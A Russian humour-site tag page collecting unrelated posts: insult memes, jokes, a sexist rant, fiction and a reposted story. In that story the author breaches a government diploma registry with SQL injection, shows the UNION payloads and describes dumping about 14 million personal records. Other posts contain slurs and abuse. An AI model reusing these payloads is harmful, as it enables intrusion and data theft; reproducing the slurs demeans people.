Результаты поиска потегуtext

Дополнительные фильтры
Теги:
textновый тег
Автор поста
Рейтинг поста:
-∞050100200300400+
Найдено: 961
Сортировка:
® о;
ГОСПОДАМ СЧИТАЮ ВАС ВСЕХ НЕЧЕСТИВЫМИ МУЖЕЛОЖЦАМИ
@
ТАКЖЕ СПЕШУ СООБЩИТЬ,ЧТО ИМЕЛ КОНТАКТ ПОЛОВОЙ С ВАШИМИ МАТУШКАМИ
@
НЕКОТОРЫЕ НАСТОЛЬКО БЫЛИ ПОЛНОТЕЛЫ,ЧТО ПОНЯТЬ ГДЕ ИХ СРАМНОЕ МЕСТО НЕ ПРЕДСТАВЛЯЛОСЬ ВОЗМОЖНЫМ
@
ОДНАКО Я ВЕСЬМА УМЕН И НАХОДЧИВ
ПРОСИЛ ЭТИХ УВАЖАЕМЫХ ЛЕДИ ИСПУСТИТЬ
Конструктор:
– Я закончил расчеты, на этот фундамент с такой конструкцией требуется применить бетон м450, вот заключение.

Проектировщик:
– Конструктора вечно всё берут с 10ти кратным запасом, можете смело использовать бетон м400.

Директор:
– Снабжение, нам нужно заработать на этом объекте, закупайте бетон м350.

Снабженец:
– Братан, я оплачу бетон м350, сделай на него документы, а ты привези м300, попилим.

Бетонный узел:
– Технолог, заказ на м300, но он вечно платит копейки, еще и задерживает, отправляй ему м250.

Технолог:
*Крутит и выставляет м200, потому что 500 кг цемента спер к себе на дачу*

Бригадир:
– Мужики, нам м200 привезут, досыпайте песка и воды по полковша, но не больше половины!

Заказчик:
– Извините, а это нормально, что у меня крыша под прихожей?
,бетон,Строители,воровство,инженер,текст,Истории

Отличный комментарий!

Увы, такая проблема есть во многих странах, в том числе в Китае, США и Индии
ПОЛИТОЕБЫ НА РАЗВЛЕКАТЕЛЬНЫХ САЙТАХ
- Увы, такая проблема есть во многих странах, в том числе в Китае, США и Индии

Где контент ублюдочные твари?

Задрали дерьмище свое школьное постить, вонючие твари

Ебучие собаки с вытаращенными глазами, пиздец "забавно", обсмеялся весь

Какой-то отстой в виде комиксов- фандом есть, а сюжет говно ебаное для аутистов

Поглаживание крокодильчиков с абсолютно бездушным сюжетом для умственно отсталых.

Один лишь фурри арт радует, остальное все говнище для пушистого розового аутиста


Идите на хуй вообще
«Борьба с «сексуальными приставаниями» в самом разгаре. И ее активисты в видеоигровой индустрии нашли себе новую мишень — создателя легендарной компании Atari Нолана Бушнелла. Человека иногда называют «отцом видеоигровой индустрии», но для современных охотников на ведьм это ничего не значит. На Game Developer Conference 2018 ему предполагалось вручить награду за пионерство. И тут «защитники женских прав» вспомнили о статьях, описывавших культуру Atari в 70-е годы прошлого века как полную наркотиков, пьянства и разврата. Сотрудники называли свои проекты именами симпатичных женщин-коллег, а сам Бушнелл щеголял в майке I love to fuck. Разумеется, заслуженный девелопер немедленно оказался под огнем критики. А руководство GDC теперь собирается передумать его награждать».

Я выделил грехи болдом. Видно?
Наркотики это фуфуфу. Но любой кто читал, практически про любой творческий коллектив западных 70х, автоматом читал про травку, а то и про кокаин с ЛСД. Но дело конечно не в наркотиках, которые фуфуфу.
Дело в «разврате». Я потом поищу «грязные подробности» дополнительно но пока имееем две.
1) Майку с надписью «Я люблю трахатся».
2) Название проектов в честь девчонок на проекте.

Итак, для начала человек любит трахатся. А кто не любит? Он так и написал. Не «Я люблю рвать своим членом похотливых бабенок», а «Я люблю трахатся».
После этого любая свободная и раскрепощенная женщина, может, если сама того захочет, подойти к нему и сказать: «Я тоже. Пошли трахатся, но чур я сверху». Черт, да эта футболка не проблема, а решение проблемы с этим вашим «обязательным согласием женщин и пасивных геев на секс».
Далее, насколько же упертым фанатиком надо быть чтоб заагрится на такую футболку? Давайте просто представим.
Вы идете в футболке «Я люблю есть» и к вам подвигают самые еб_ые и радикальные веганы, прям вот из анекдотов, и начинают орать «Небось мясо любишь есть! Теленочков маленьких, с влажными глазками жрешь, сука!»
Че не становится на место? Не выглядит поводом для возмущения даже у карикатурных фанатиков? Даже сторонники питания «космической энергией» вроде не должны возмутится.
А кто должен? Разве что те кто отрицают еду и её поедание. Любую. И агрессивно навязывают голод другим.
Так и здесь. Мы имеем реальных (а не из анекдотов) людей которые, судя по всему, решили запретить всем сочетаться актами любви. Наказывать собираются уже за одно упоминание о сексе. Причем  40летней давности.
На футболке. Мэтт Тейлор похоже теперь на втором месте.)

Пункт второй вообще непонятен. Поднимите руку кто откажется от названия игры в его честь? Поднимите руку кто воспримет это как оскорбление?
Может это было в контексте? Типа:
-Эй, красотка, я назвал свой игровой проект в честь тебя!
-»Мисс. Пакман»! Это потому что я бодипозитивная азиатка, да, хуемразь!
Все других вариантов не вижу.
Но поскольку никаких упоминаний типа «называли ПЛОХИЕ проекты именами женщин-коллег» я в новости не вижу, сей расклад мне непонятен.
Только подумайте они требуют чтобы, мужика лишили премии за то что в его фирме имена женщин использовали в названии проектов, и предлагают отдать эту отнятую премию женщинам внесшим вклад в игровую индустрию!
Эй! Этот мужик по сути и занимался тем что отмечал имена женщин внесших вклад в игровую индустрию! Вы собираетесь отнять приз за то же самое за что собираетесь его вручить!
Потом не обижайтесь бабаньки, что «женская логика» устойчивая идиома!

Сам Нолан, впрочем, стандартно извинился. Правда звучало это как «Если вам так важно отнять у меня премию, и вы считаете что это на пользу кому-то, то конечно забирайте, не жалко».
Хм, а так подумать, кому было бы жалко премии для которой работу всей твоей жизни, перевесила твоя старая футболка?

п.с.: Погуглил.
Нашелся ещё один «дополнительный грех». На одной из вечеринок он пытался затащить девчонку в джакузи! Кажется это все.
OISK 4BK App-lc II Plus or Aotfesoft in Rom OOS 3.2 Of 3.3
N-LINE s>'s'ems
presents
SÛFTPÛRN ADVENTURE
FOR ADUL TS ONL Y!
Charles Benton
NOTE: Thi* game a R Rated It n not suggested lor Minors or persons easily offended It is offered solely (or entertainment value No other purpose is intended


Про настоящих преступников

Когда двое полицейских быковатого вида заволокли в кабинет тщедушного паренька, следователь Григорий Анисимов курил сигарету, аккуратно стряхивая пепел в гранёный стакан. Подчинённые удалились, а Анисимов, не вставая, сквозь дым буравил цепким взглядом свежепойманную добычу. Добыче на вид было лет двадцать с небольшим, одет во всё неприметное, капюшон надвинут на брови. “В камеры, значит, светиться не хочет, погань, - подумал майор в штатском, но вслух лишь произнёс, - ты понимаешь, что из-за таких, как ты, погибает наша молодёжь, наша страна, наша Родина!” На последнем слове кулак хозяина кабинета рухнул на стол так громко, что собеседник подскочил. Анисимов неторопливо прикурил от старой сигареты следующую. “Родители-то хоть знают?- следователь злобно сузил глаза, - или уже с зоны им напишешь в письме? А ты знаешь что там делают с такими, как ты?” Анисимов резко вскочил на ноги и подошёл так близко, что арестованный почувствовал запах дешёвого одеколона: “Там-то гадостью этой больше не будешь торговать. Тебя там быстро приструнят, щенок”. Развернувшись на каблуках своих тупоносых туфель, следователь вышел за дверь, оставив парнишку наедине с запахом Шипра и портретом Глеба Жеглова. Из коридора донеслось: “Семёнов, Васютин! Тащите комплект… Что значит какой?! Аккумулятор, бутылку, противогаз, вы всё знаете. Сейчас он нам расскажет где взял, как взял и кому продал. Сколько, говорите, биткоинов у него нашли?”

отсюда
"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ
РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра


Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).

Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке
Уровень образования
Не выбрано
Уровна* обрио
Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи:
О Найти 00 по


Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>

Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.

Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция
...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…

В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…

В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…

Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…

Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…

Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…

А не пора ли...

За окном висел гнилой вечер середины февраля. Василий жадно втянул воздух и ощутил неожиданно резкий запах. В его квартире уже полтора месяца безуспешно боролось за жизнь, умирало и, наконец, тлело существо, в котором ещё недавно теплилась жизнь. Он увидел её за городом, проезжая безлюдное место. Стройная, высокая - Василий осклабился и страстно возжелал завладеть столь лакомой добычей. Лишь морозный воздух был свидетелем, как он, прикрываясь тишиной и сумерками, волок её по снегу в свой ржавый пикап. Его лицо украшали свежие царапины: она недолго защищалась перед тем, как всё было кончено. Дома он до беспамятства накачался водкой, и решил сделать её ослепительной. Похожей на ту, что была когда-то у него в детстве. Когда наигрался, поспешил завернуть былую красоту в целлофан, чтобы быстрее забыть. А теперь, когда хмельной дурман в голове развеялся, и запах, доносящийся из угла, стал просто невыносим - Василий скрипнул зубами и решился: нужно избавиться от неё раз и навсегда. Не весной же, в самом деле, ёлку выносить. Соседи засмеют.

отсюда: t.me/itelnyestories
,моё творчество,текст,Истории,кулстори,а ты вынес?,песочница

Сайленс (не настоящее имя)

Выглядит обычно как гуманоидное женоподобное существо. Формы тела у сайленс весьма пышные, но она вполне может стать стройней длиней (либо части тела изменятся в длине). Она находится в постоянной метаморфозе из-за чего не может полноценно удерживать эту форму (в наш мир она проецируется из вне). Рост колеблется от 2 метров до 2.5 метров. Кожа серая. Глаза у Сайлентс отсутствует из-за того что Сайленс видит всё пространство миллионами призрачных глаз. Иногда принимает иные ,облики которые зависят от настроения и желания носителя. На самом деле Сайленс выглядит как некое постоянно переливающееся нефтеподобное дерево которое находится в чёрном ,поле не имеющем концов. Поле так же переливается как нефть. В "небе" постоянно плывут тучи, через которые пробиваются лучи света, единственный истоник света в этом мире.
Сайленс ходит с постоянной улыбкой, но не стоит забывать что это всеголишь один из обликов...одна из масок и не стоит думать что она одарит вас чем то хорошим...может просто оторвать вам руку и улыбка только растянется. По большей части ведёт себя спокойно и даже дружелюбна, но иногда её будто срывает с катушек и она может устроить настоящую бойню.
Никогда невозможно ,понять что скрывается за её улыбкой...
Сайленс весьма похотлива. Она вполне может совместить резню и плотские утехи. Но есть одно но...её может сдерживать носитель. Она подстраивается под носителя для комфортного сосуществования и для неё не проблема прожить с носителем около 100 лет ведь для неё они как мимолётное развлечение. И по этому она даже не против что б над ней взяли верх...но иногда склонять пытается носителя к своим интересам ради интереса оставит ли свои принцыпы носитель или же будет их отстаивать, не смотря на сладость свободы действий, пускай и короткую(пока полиция не пристрелит).
Сайленс может манипулировать пространством создава, некое подобие копии своего мира в небольшой зоне до 1-го километра. В этой зоне она может разрывать в клочья всё что пожелает и быть одновременно всюду и нигде (в зоне), так же манипулировать со временем и естественно может перестроить всё пространство в свой собственный лабиринт.
Нравится чувствовать, когда носитель испытывает любые сильные эмоции. Для неё это словно наркотик. Она получает экстаз от чувств смертных.
Сайленс защищает своего носителя от проблем, что могут лишить его большей части эмоций которыми она питается. Пытается создать комфорт для носителя воздействиями на внешний мир и попытками уберечь от смерти.
Здесь мы собираем самые интересные картинки, арты, комиксы, мемасики по теме (+961 постов - )